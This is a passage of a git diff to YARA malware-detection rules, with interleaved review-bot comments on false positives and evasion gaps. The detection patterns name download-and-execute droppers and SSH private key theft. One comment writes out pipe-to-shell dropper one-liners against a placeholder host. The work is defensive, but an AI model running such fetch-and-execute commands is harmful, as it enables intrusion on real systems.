tests/macOS/2024.Ezuri/libdpt1.so.simple | 1 - tests/macOS/2024.LightSpy/dropper.simple | 4 +- tests/macOS/2024.Rustdoor/localfile.simple | 1 - tests/macOS/clean/ls.mdiff | 1 - tests/macOS/clean/ls.sdiff.level_2 | 1 - tests/macOS/clean/ls.sdiff.trigger_2 | 1 - tests/macOS/clean/ls.sdiff.trigger_3 | 1 - tests/npm/2024.harthat/deference.js.simple | 2 +- .../2024.next-react-notify/tocall.js.simple | 2 +- tests/php/2024.sagsooz/2024.php.simple | 2 +- tests/php/clean/run-tests.php.simple | 1 - .../python/2021.DiscordSafety/setup.py.simple | 2 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- tests/python/clean/numpy/misc_util.py.simple | 1 + .../clean/versioneer/versioneer.py.simple | 1 + .../windows/2024.GitHub.Clipper/raw.py.simple | 2 +- .../windows/2024.aspdasdksa2/creal.exe.simple | 1 - .../windows/2024.aspdasdksa2/creal.pyc.simple | 1 - 149 files changed, 426 insertions(+), 319 deletions(-) rename rules/anti-static/{packer/elf.yara => elf/content.yara} (58%) create mode 100644 rules/anti-static/elf/tiny.yara rename rules/anti-static/{binary => macho}/tiny.yara (70%) rename rules/{ => discover}/process/effective-groupid-get.yara (100%) rename rules/{ => discover}/process/effective-userid-get.yara (100%) rename rules/{ => discover}/process/limit-get.yara (100%) rename rules/{ => discover}/process/name-get.yara (100%) rename rules/{ => discover}/process/parent_pid-get.yara (100%) rename rules/{ => discover}/process/pid-get.yara (100%) rename rules/{ => discover}/process/priority-get.yara (100%) create mode 100644 rules/discover/process/runtime_deps.yara rename rules/{ => discover}/process/userid-get.yara (100%) rename rules/{ => discover}/process/working_directory-get.yara (100%) rename rules/evasion/file/location/{odd_pidfile.yara => pidfile.yara} (100%) delete mode 100644 rules/evasion/file/location/system_directories.yara rename rules/evasion/file/location/{tmp_x11-unix.yara => x11-unix.yara} (80%) create mode 100644 rules/exec/shell/sighup_trap.yara create 
mode 100644 rules/false_positives/libdw.yara delete mode 100644 rules/process/thread_local_storage.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index bcb250b48..1fb170804 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -74,7 +74,6 @@ fs/symlink_resolve: low fs/tempdir/tempfile_create: low fs/unmount: low impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/rules/anti-static/packer/elf.yara b/rules/anti-static/elf/content.yara similarity index 58% rename from rules/anti-static/packer/elf.yara rename to rules/anti-static/elf/content.yara index bdee7686e..5620752d2 100644 --- a/rules/anti-static/packer/elf.yara +++ b/rules/anti-static/elf/content.yara @@ -1,4 +1,4 @@ -import "math" +import "elf" rule obfuscated_elf: high linux { meta: @@ -27,21 +27,5 @@ rule obfuscated_elf: high linux { $debuglink = ".gnu_debuglink" fullword condition: - uint32(0) == 1179403647 and none of them -} - -rule high_entropy_header: high { - meta: - description = "high entropy ELF header (>7)" - hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d" - hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59" - hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0" - - strings: - $not_pyinst = "pyi-bootloader-ignore-signals" - $not_go = "syscall_linux.go" - $not_go2 = "vdso_linux.go" - - condition: - uint32(0) == 1179403647 and math.entropy(1200, 4096) > 7 and none of ($not*) + filesize > 512 and elf.type == elf.ET_EXEC and uint32(0) == 1179403647 and none of them } diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara index 26bdc373a..72cfcf6d9 100644 --- a/rules/anti-static/elf/entropy.yara +++ b/rules/anti-static/elf/entropy.yara 
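Review bot: The new `elf.type == elf.ET_EXEC` term in the `obfuscated_elf` condition also drops PIE executables, which the loader sees as ET_DYN, and on the Ubuntu builds this series is tuning for PIE is the default, so the rule now skips most native programs rather than only shared libraries. If the intent is only to exclude libraries, a PT_INTERP segment separates a PIE program from a plain `.so`, e.g. `(elf.type == elf.ET_EXEC or for any i in (0..elf.number_of_segments): (elf.segments[i].type == elf.PT_INTERP))` (untested); if skipping PIE is deliberate, a one-line comment above `condition:` saying so would stop the next reader from "fixing" it. The rule's string list begins above this hunk.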
@@ -12,16 +12,16 @@ private rule small_elf { rule normal_elf_high_entropy_7: medium { meta: - description = "higher entropy ELF binary (>7)" + description = "higher entropy ELF binary (>7.1)" condition: - normal_elf and math.entropy(1, filesize) >= 7 + normal_elf and math.entropy(1, filesize) >= 7.1 } rule normal_elf_high_entropy_7_2: high { meta: - description = "high entropy ELF binary (>7.2)" + description = "high entropy ELF binary (>7.4)" condition: - normal_elf and math.entropy(1, filesize) >= 7.2 + normal_elf and math.entropy(1, filesize) >= 7.4 } diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara index 252ca50b0..bb8f24f25 100644 --- a/rules/anti-static/elf/header.yara +++ b/rules/anti-static/elf/header.yara @@ -1,4 +1,5 @@ import "elf" +import "math" rule single_load_rwe: critical { meta: 
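Review bot: The thresholds move to 7.1 and 7.4 but the rule names stay `normal_elf_high_entropy_7` and `normal_elf_high_entropy_7_2`, and rule names appear to be what scan output reports as the rule ID (see the `RuleName` fields in the JSON fixtures earlier on this page), so the emitted identifiers now misstate the cutoff. Either rename them (`rule normal_elf_high_entropy_7_1: medium {` / `rule normal_elf_high_entropy_7_4: high {`) and refresh the fixtures, or add `// name kept for fixture stability; actual threshold is 7.4` above each condition. The descriptions also say "(>7.1)"/"(>7.4)" while the conditions use `>=`; "(>=7.4)" is the accurate form. `normal_elf` is a private rule defined above this hunk.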
@@ -38,3 +39,21 @@ rule fake_dynamic_symbols: critical {
 condition:
 elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset))))
 }
+
+
+rule high_entropy_header: high {
+ meta:
+ description = "high entropy ELF header (>7)"
+ hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d"
+ hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59"
+ hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0"
+
+ strings:
+ $not_pyinst = "pyi-bootloader-ignore-signals"
+ $not_go = "syscall_linux.go"
+ $not_go2 = "vdso_linux.go"
+ $not_module = ".module_license" fullword
+
+ condition:
+ uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*)
+}
diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara
new file mode 100644
index 000000000..311e888cc
--- /dev/null
+++ b/rules/anti-static/elf/tiny.yara
@@ -0,0 +1,9 @@
+import "elf"
+
+rule impossibly_small_elf_program: high {
+ meta:
+ description = "ELF binary is unusually small"
+
+ condition:
+ filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC
+}
\ No newline at end of file
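Review bot: `$not_module = ".module_license" fullword` reads like a kernel-module exclusion, but if it is, kernel objects are ET_REL and the same hunk now requires `elf.type == elf.ET_EXEC`, so the string is presumably dead under the new condition; worth confirming which file triggered it and dropping it if so. The `math.entropy(1200, 4096)` window also has no size floor: as far as I recall the math module, an executable shorter than ~5.3 KB gets its entropy computed over whatever bytes exist past offset 1200, a noisier measurement than the description "high entropy ELF header" implies, so either `filesize >= 5296 and` ahead of the entropy term or a comment stating the partial window is intentional would make the behaviour explicit. The ET_EXEC-only guard has the same PIE caveat as in content.yara: PIE programs are ET_DYN and are now skipped.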
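Review bot: tiny.yara is added without a trailing newline (`\ No newline at end of file`); YARA tolerates it, but the other rule files in this patch end with `}` plus newline and the next edit will produce a noisy diff. The `elf.type == elf.ET_EXEC` term also means a small PIE/ET_DYN stub, the form a current toolchain emits by default, never matches, so the description `ELF binary is unusually small` overstates coverage; either widen to `(elf.type == elf.ET_EXEC or elf.type == elf.ET_DYN)` if tiny shared objects are also worth a hit, or add `// non-PIE only; PIE stubs are ET_DYN` above `condition:`.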
diff --git a/rules/anti-static/binary/tiny.yara b/rules/anti-static/macho/tiny.yara similarity index 70% rename from rules/anti-static/binary/tiny.yara rename to rules/anti-static/macho/tiny.yara index acd73140d..e36911bd8 100644 --- a/rules/anti-static/binary/tiny.yara +++ b/rules/anti-static/macho/tiny.yara @@ -1,12 +1,3 @@ -import "elf" - -rule impossibly_small_elf_program: high { - meta: - description = "ELF binary is unusually small" - - condition: - filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC -} rule impossibly_small_macho_program: medium { meta: diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara index 6dc723eb9..72201b846 100644 --- a/rules/anti-static/obfuscation/bitwise.yara +++ b/rules/anti-static/obfuscation/bitwise.yara @@ -30,7 +30,9 @@ rule excessive_bitwise_math: high { $not_algbase = "algbase" fullword $not_jslint = "jslint bitwise" $not_include = "#define " - + $not_bitwise = "bitwise" fullword + $not_bitmasks = "bitmasks" fullword + $not_ckbcomp = "ckbcomp" fullword condition: filesize < 192KB and #x > 64 and none of ($not*) } diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara index dce5d126b..20567d367 100644 --- a/rules/anti-static/obfuscation/python.yara +++ b/rules/anti-static/obfuscation/python.yara @@ -261,8 +261,9 @@ rule python_hex_decimal: high { $trash = /\\x{0,1}\d{1,3}\\/ + $not_testing_t = "*testing.T" fullword condition: - filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 + filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*) } rule dumb_int_compares: high { diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index d7f85d70d..fae0a09d4 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara 
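Review bot: `$not_bitwise = "bitwise" fullword` is a one-word opt-out for `excessive_bitwise_math`: because the condition is `none of ($not*)`, a single occurrence of the bare word anywhere in the file, including a comment an obfuscator adds on purpose, disables the rule, and it also subsumes the existing `$not_jslint = "jslint bitwise"`, which becomes dead. If the false positive came from one project, a longer phrase taken from that file keeps the exclusion narrow, and at minimum a comment naming the source, e.g. `// bitmasks/ckbcomp: presumably console-setup, which legitimately does heavy bit math`, records why these three are here.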
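Review bot: `$not_testing_t = "*testing.T" fullword` is a Go-only token added to a rule named `python_hex_decimal`; it silences one Go false positive but leaves the underlying cause, that nothing visible in the condition requires the file to be Python, in place. A comment `// Go test sources trip $trash (escaped byte literals near EOF); exclusion is a stopgap` would explain the odd entry; a Python anchor in the condition (a `def ` fullword string or a python shebang) would fix it properly. `rule dumb_int_compares` at the end of the hunk continues outside it.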
@@ -39,7 +39,8 @@ rule elf_hardcoded_ip: high { $not_1_2_3_4 = "1.2.3.4" $not_root_servers_h = "128.63.2.53" $not_root_servers_i = "192.36.148.17" - + $not_123456789 = "123.45.67.89" + $not_libebt_among_init = "libebt_among_init" condition: filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } @@ -73,15 +74,17 @@ rule hardcoded_ip_port: high { strings: $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}:\d{2,5}/ fullword - $not_ssdp = "239.255.255.250:1900" + $not_ssdp = "239.255.255.250:" $not_2181 = "10.101.203.230:2181" - $not_meta = "169.254.169.254:80" - $not_vnc = "10.10.10.10:5900" + $not_meta = "169.254.169.254:" + $not_vnc = "10.10.10.10:" $not_azure_pgsql = "20.66.25.58:5432" $not_wireguard = "127.212.121.99:999" $not_minio = "172.16.34.31:9000" $not_test = "def test_" fullword - + $not_12 = "12.12.12.12:" + $not_21 = "21.21.21.21:" + $not_255 = "255.255.255.255:" condition: any of ($ip*) and none of ($not*) } diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index bbdfdb214..dd456fc0f 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara 
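Review bot: The `$not_*` entries in `hardcoded_ip_port` are file-wide suppressors: `none of ($not*)` switches the rule off for the whole file as soon as one allow-listed literal appears, and this hunk widens several to bare prefixes (`239.255.255.250:`, `169.254.169.254:`, `10.10.10.10:`) and adds `255.255.255.255:`, so a sample that carries the metadata-service or broadcast address next to its real C2 `ip:port` is no longer flagged. Since every IP-shaped `$not` string is itself a `$ipv4` match, the allow-list can be applied per match instead of per file, roughly `#ipv4 > #not_ssdp + #not_2181 + #not_meta + #not_vnc + #not_azure_pgsql + #not_wireguard + #not_minio + #not_12 + #not_21 + #not_255 and not $not_test`. The rule's `meta` block is above this hunk.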
@@ -25,25 +25,48 @@ rule exotic_tld: high { $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" $not_whois = "bdia.btcl.com.bd" + $not_arduino = "arduino.cc" condition: filesize < 10MB and any of ($http*) and none of ($not_*) } -rule binary_http_url_with_question: high { + + + +rule http_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" strings: + $f_import = "import" fullword + $f_require = "require" fullword + $f_curl = "curl" fullword + $f_wget = "wget" fullword + $f_requests = "requests.get" fullword + $f_requests_post = "requests.post" fullword + $f_urllib = "urllib.request" fullword + $f_urlopen = "urlopen" fullword $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ $not_rev_head = "?rev=HEAD" + $not_cgi = ".cgi?" + + condition: + filesize < 256KB and any of ($f*) and $ref and none of ($not*) +} + +rule binary_php_url_with_question: high { + meta: + description = "contains hardcoded endpoint with a question mark" + strings: + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ condition: - filesize < 150MB and elf_or_macho and $ref and none of ($not*) + filesize < 150MB and elf_or_macho and $ref } -rule script_with_binary_http_url_with_question: high { +rule script_php_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" @@ -56,10 +79,7 @@ rule script_with_binary_http_url_with_question: high { $f_requests_post = "requests.post" fullword $f_urllib = "urllib.request" fullword $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ - $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ - $not_rev_head = "?rev=HEAD" - + $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ condition: - filesize < 256KB and any of ($f*) and $ref and none of ($not*) + filesize < 256KB and any of ($f*) and $ref } 
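Review bot: All three rules in this hunk (`http_url_with_question`, `binary_php_url_with_question`, `script_php_url_with_question`) now carry the identical description `contains hardcoded endpoint with a question mark`, so a report cannot tell the medium generic hit from the high `.php?` hit. Suggest `description = "contains hardcoded .php endpoint with query string"` on the two PHP rules. `binary_php_url_with_question` also drops the `$not_cvs_sourceforge`/`$not_rev_head` exclusions the old rule had; with the pattern narrowed to `\.php\?` that is probably fine, but a `viewvc.php?rev=`-style link in a binary would now fire at high, so if that was the original false positive a `$not_rev = "?rev="` line is cheap insurance.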
diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara index 3226a2d98..802c8bbda 100644 --- a/rules/c2/tool_transfer/shell.yara +++ b/rules/c2/tool_transfer/shell.yara @@ -156,11 +156,10 @@ rule fetch_chmod_execute: high { rule possible_dropper: high { meta: - description = "downloads and execute a program" + description = "download and execute a program" strings: - $http = "http://" - $https = "https://" + $http = /https{0,1}:\/\/[\.\w\/\?\=\-]{1,64}/ $tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\.\- :\"\/]{0,64}/ $tool_wget_q = "wget -" $tool_lwp = "lwp-download" @@ -169,10 +168,10 @@ rule possible_dropper: high { $cmd_rm = "rm" fullword $cmd_sleep = "sleep" fullword $cmd_echo = "echo" fullword - $cmd_chmod = "chmod" fullword + $chmod = "chmod" fullword condition: - filesize < 1KB and any of ($http*) and any of ($tool*) and any of ($cmd*) + filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*) } rule nohup_dropper: critical { diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara index fd0f0add5..70f1b84fd 100644 --- a/rules/credential/ssh/ssh.yara +++ b/rules/credential/ssh/ssh.yara @@ -8,14 +8,14 @@ rule ssh_folder: medium { strings: $slash = "/.ssh" - $re = /[\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword + $re = /[\~\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword $pkg = /[a-z]{2,16}\.ssh/ condition: filesize < 20MB and $slash or ($re and not $pkg) } -rule id_rsa: high { +rule id_rsa: medium { meta: description = "accesses SSH private keys" 
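Review bot: Requiring `$chmod` in `possible_dropper` means the one-line dropper that never touches the mode bit (`curl -s http://x/y | sh`, `wget -qO- ... | bash`) no longer matches this rule even though it still satisfies the `$http`/`$tool`/`$cmd` terms. That is a fair trade if pipe-to-shell is owned by another rule (none is visible in this patch), but the description `download and execute a program` now overstates what is checked; `download, chmod and execute a program` is accurate, and `// pipe-to-shell droppers without chmod: see <rule>` above `condition:` would record where they went. `rule nohup_dropper` at the end of the hunk continues outside it.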
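Review bot: The `ssh_folder` condition directly under the changed `$re` reads `filesize < 20MB and $slash or ($re and not $pkg)`; YARA binds `and` tighter than `or`, so the size cap guards only the `$slash` branch and the newly widened `~`-prefixed regex is evaluated on files of any size. If the cap is meant for both, `filesize < 20MB and ($slash or ($re and not $pkg))`. Note also that `not $pkg` is file-wide: one `something.ssh` identifier anywhere suppresses the regex branch for the whole file, which is worth a comment since it is not obvious from the rule.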
@@ -25,3 +25,20 @@ rule id_rsa: high {
 condition:
 filesize < 10MB and ssh_folder and $id_rsa
 }
+
+
+rule id_rsa_not_ssh: high {
+ meta:
+ description = "non-SSH client accessing SSH private keys"
+
+ strings:
+ $id_rsa = "id_rsa" fullword
+ $not_ssh_newkeys = "SSH_MSG"
+ $not_ssh_userauth = "SSH_USERAUTH"
+ $not_ssh_20 = "SSH-2.0"
+ $not_openssh = "OpenSSH"
+ $not_ssh2 = "SSH2" fullword
+ $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK"
+ condition:
+ filesize < 10MB and ssh_folder and $id_rsa and none of ($not*)
+}
diff --git a/rules/process/effective-groupid-get.yara b/rules/discover/process/effective-groupid-get.yara
similarity index 100%
rename from rules/process/effective-groupid-get.yara
rename to rules/discover/process/effective-groupid-get.yara
diff --git a/rules/process/effective-userid-get.yara b/rules/discover/process/effective-userid-get.yara
similarity index 100%
rename from rules/process/effective-userid-get.yara
rename to rules/discover/process/effective-userid-get.yara
diff --git a/rules/process/limit-get.yara b/rules/discover/process/limit-get.yara
similarity index 100%
rename from rules/process/limit-get.yara
rename to rules/discover/process/limit-get.yara
diff --git a/rules/process/name-get.yara b/rules/discover/process/name-get.yara
similarity index 100%
rename from rules/process/name-get.yara
rename to rules/discover/process/name-get.yara
diff --git a/rules/process/parent_pid-get.yara b/rules/discover/process/parent_pid-get.yara
similarity index 100%
rename from rules/process/parent_pid-get.yara
rename to rules/discover/process/parent_pid-get.yara
diff --git a/rules/process/pid-get.yara b/rules/discover/process/pid-get.yara
similarity index 100%
rename from rules/process/pid-get.yara
rename to rules/discover/process/pid-get.yara
diff --git a/rules/process/priority-get.yara b/rules/discover/process/priority-get.yara
similarity index 100%
rename from rules/process/priority-get.yara
rename to rules/discover/process/priority-get.yara
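Review bot: In `id_rsa_not_ssh` the exclusions are plain tokens, and `$not_SSH_AUTH_SOCK` in particular is one a credential stealer is likely to carry, since agent-socket access and `id_rsa` theft go together; an `OpenSSH` banner string is equally easy to embed. As written, a stealer that mentions the agent socket or spoofs the banner drops from this high rule back to the medium `id_rsa` rule. Consider removing `$not_SSH_AUTH_SOCK`, or requiring real protocol evidence rather than any single marker, e.g. `and not (2 of ($not_ssh*))` in place of `and none of ($not*)`, and add a comment above `strings:` stating that these markers are meant to identify an SSH implementation, not a mere reference to SSH. `ssh_folder` is defined above this hunk.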
diff --git a/rules/discover/process/runtime_deps.yara b/rules/discover/process/runtime_deps.yara new file mode 100644 index 000000000..5abe0ebdd --- /dev/null +++ b/rules/discover/process/runtime_deps.yara @@ -0,0 +1,27 @@ +rule tls_get_addr: medium { + meta: + description = "looks up thread private variables, may be used for loaded library discovery" + ref = "https://chao-tic.github.io/blog/2018/12/25/tls" + + strings: + $val = "__tls_get_addr" fullword + + condition: + any of them +} + +import "elf" +import "math" + +rule sus_dylib_tls_get_addr: high { + meta: + description = "suspicious runtime dependency resolution" + + strings: + $val = "__tls_get_addr" fullword + $not_trampoline = "__interceptor_trampoline" + $not_glibc_private = "GLIBC_PRIVATE" + + condition: + filesize < 500KB and elf.type == elf.ET_DYN and $val and none of ($not*) and math.entropy(1, filesize) >= 6 +} diff --git a/rules/process/userid-get.yara b/rules/discover/process/userid-get.yara similarity index 100% rename from rules/process/userid-get.yara rename to rules/discover/process/userid-get.yara diff --git a/rules/process/working_directory-get.yara b/rules/discover/process/working_directory-get.yara similarity index 100% rename from rules/process/working_directory-get.yara rename to rules/discover/process/working_directory-get.yara diff --git a/rules/evasion/file/location/chdir-unusual.yara b/rules/evasion/file/location/chdir-unusual.yara index 5df099283..78b3d4d44 100644 --- a/rules/evasion/file/location/chdir-unusual.yara +++ b/rules/evasion/file/location/chdir-unusual.yara @@ -76,8 +76,9 @@ rule cd_var_subdir: high { $d_var_run = "cd /var/run" $d_var_tmp = "cd /var/tmp" + $not_var_log_packages = "cd /var/log/packages" condition: - any of ($d*) + any of ($d*) and none of ($not*) } rule cd_val_obsessive: critical { 
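Review bot: `__tls_get_addr` is the libc accessor that, in my experience, nearly every shared object built with thread-local storage imports, so `tls_get_addr: medium` will fire on most `.so` files and `sus_dylib_tls_get_addr: high` on any stripped library under 500 KB whose whole-file entropy clears 6, which is ordinary for optimized builds; neither description says what makes the reference suspicious, and the `ref` link is about how TLS works rather than about abuse. Please document the intended signal, e.g. `description = "small, high-entropy ET_DYN importing __tls_get_addr outside glibc; possible injected library"`, or gate the high rule on a second indicator. Style: the `import "elf"`/`import "math"` lines sit between the two rules, which YARA accepts but every other file in this patch avoids, and `$val = "__tls_get_addr" fullword` is declared twice.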
diff --git a/rules/evasion/file/location/odd_pidfile.yara b/rules/evasion/file/location/pidfile.yara
similarity index 100%
rename from rules/evasion/file/location/odd_pidfile.yara
rename to rules/evasion/file/location/pidfile.yara
diff --git a/rules/evasion/file/location/system_directories.yara b/rules/evasion/file/location/system_directories.yara
deleted file mode 100644
index f70414ddd..000000000
--- a/rules/evasion/file/location/system_directories.yara
+++ /dev/null
@@ -1,14 +0,0 @@
-rule system_fs_manipulator: medium {
- meta:
- description = "Modifies files within system directories"
- hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3"
- hash_2023_Linux_Malware_Samples_e212 = "e2125d9ce884c0fb3674bd12308ed1c10651dc4ff917b5e393d7c56d7b809b87"
- hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd"
-
- strings:
- $in_usr = /(mv|chattr|rm|touch) \/(bin|root|sbin|usr|var|lib|lib64|boot)\/[ \.\w\/]{0,64}/
- $not_mdm = "/var/db/MDM_EnableManagedApps"
-
- condition:
- $in_usr and none of ($not*)
-}
diff --git a/rules/evasion/file/location/system_directory.yara b/rules/evasion/file/location/system_directory.yara
index f6e2c454a..9f2bd2899 100644
--- a/rules/evasion/file/location/system_directory.yara
+++ b/rules/evasion/file/location/system_directory.yara
@@ -9,3 +9,18 @@ rule cp_to_apple_directory: high { condition: any of them } + +rule system_fs_manipulator: medium { + meta: + description = "Modifies files within system directories" + hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3" + hash_2023_Linux_Malware_Samples_e212 = "e2125d9ce884c0fb3674bd12308ed1c10651dc4ff917b5e393d7c56d7b809b87" + hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" + + strings: + $in_usr = /(mv|chattr|rm|touch) \/(bin|root|sbin|usr|var|lib|lib64|boot)\/[ \.\w\/]{0,64}/ + $not_mdm = "/var/db/MDM_EnableManagedApps" + + condition: + $in_usr and none of ($not*) +} diff --git a/rules/evasion/file/location/tmp_x11-unix.yara b/rules/evasion/file/location/x11-unix.yara similarity index 80% rename from rules/evasion/file/location/tmp_x11-unix.yara rename to rules/evasion/file/location/x11-unix.yara index 5ecf54dc8..dd36e841f 100644 --- a/rules/evasion/file/location/tmp_x11-unix.yara +++ b/rules/evasion/file/location/x11-unix.yara @@ -1,6 +1,6 @@ rule hidden_x11: high { meta: - description = "may store content in /tmp/.X11-unix" + description = "references content in /tmp/.X11-unix" ref = "https://www.welivesecurity.com/2021/10/07/fontonlake-previously-unknown-malware-family-targeting-linux/" strings: @@ -18,9 +18,9 @@ rule X11: override { $usr_share = "/usr/share/X11" $X11Gray = "X11Gray" $X11_space = "/etc/X11/" - $X11R6 = "X11R6" + $X11R6 = "X11R6/share" $XForwarding = "X11 forwarding" - + $X = "/tmp/.X11-unix/X" fullword condition: filesize < 10MB and any of them } diff --git a/rules/evasion/file/prefix/lib.yara b/rules/evasion/file/prefix/lib.yara index 39eb2a2dd..ebcb8ef4b 100644 --- a/rules/evasion/file/prefix/lib.yara +++ b/rules/evasion/file/prefix/lib.yara 
@@ -3,7 +3,7 @@ rule lib_subdir: high linux { description = "hides paths within a /lib subdirectory" strings: - $ref = /\/lib\/[\w\.]{0,16}\/\.[\.\w\-\%\@]{0,16}/ fullword + $ref = /\/lib\/[\w\.]{1,16}\/\.[\w\-\%\@]{1,16}/ fullword condition: any of them diff --git a/rules/evasion/file/prefix/prefix.yara b/rules/evasion/file/prefix/prefix.yara index e5160b02a..c16702d5a 100644 --- a/rules/evasion/file/prefix/prefix.yara +++ b/rules/evasion/file/prefix/prefix.yara @@ -46,7 +46,9 @@ rule hidden_short_path: high { $not_network_manager = "org.freedesktop.NetworkManager" $not_private = "/System/Library/PrivateFrameworks/" $not_X11 = "/tmp/.X11-unix" + $not_XIM = "/tmp/.XIM-unix" $not_cpp = "/tmp/.cpp.err" + $not_pwd = "/etc/.pwd.lock" condition: $crit and none of ($not*) diff --git a/rules/evasion/hijack_execution/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara index edb763205..7f4ffe56a 100644 --- a/rules/evasion/hijack_execution/etc-ld.so.preload.yara +++ b/rules/evasion/hijack_execution/etc-ld.so.preload.yara @@ -25,7 +25,7 @@ rule etc_ld_preload_not_ld: high linux { $not_env_hwcap = "LD_HWCAP_MASK" $not_env_audit = "LD_AUDIT" $not_cache = "ld.so.cache" - + $not_man = "MAN_DISABLE_SECCOMP" condition: $ref and none of ($not*) } diff --git a/rules/evasion/logging/hide_shell_history.yara b/rules/evasion/logging/hide_shell_history.yara index e29b4c4c1..d6dc08874 100644 --- a/rules/evasion/logging/hide_shell_history.yara +++ b/rules/evasion/logging/hide_shell_history.yara @@ -13,7 +13,6 @@ rule hide_shell_history: high { $h_shopt_history = "shopt -ou history" $h_set_o_history = "set +o history" $histsize_0 = "HISTSIZE=0" - $h_gotcha = "GOTCHA" $not_increment = "HISTSIZE++" condition: diff --git a/rules/evasion/logging/historical_logins.yara b/rules/evasion/logging/historical_logins.yara index 744adf978..8f348a1a4 100644 --- a/rules/evasion/logging/historical_logins.yara +++ b/rules/evasion/logging/historical_logins.yara 
@@ -1,4 +1,4 @@ -rule login_records: high { +rule login_records: medium { meta: description = "accesses historical login records" hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6" diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara index ca943c51f..3da69deac 100644 --- a/rules/evasion/mimicry/fake-library.yara +++ b/rules/evasion/mimicry/fake-library.yara @@ -33,9 +33,9 @@ rule libc_fake_number_val: high { hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682" strings: - $fake_libc_version = /libc.so.[2345789]/ - + $ref = /libc.so.[2345789]/ + $not_go_example = "libc.so.96.1" condition: - any of them + $ref and none of ($not*) } diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara index fc0f2daf4..a874c3047 100644 --- a/rules/evasion/net/http_443.yara +++ b/rules/evasion/net/http_443.yara @@ -7,7 +7,7 @@ rule http_port_443: high { $not_test = "assertEqual" $not_example = "http://example.com:443" $not_localhost = "http://localhost:443" - + $not_foo = "http://foo.com:443/" condition: 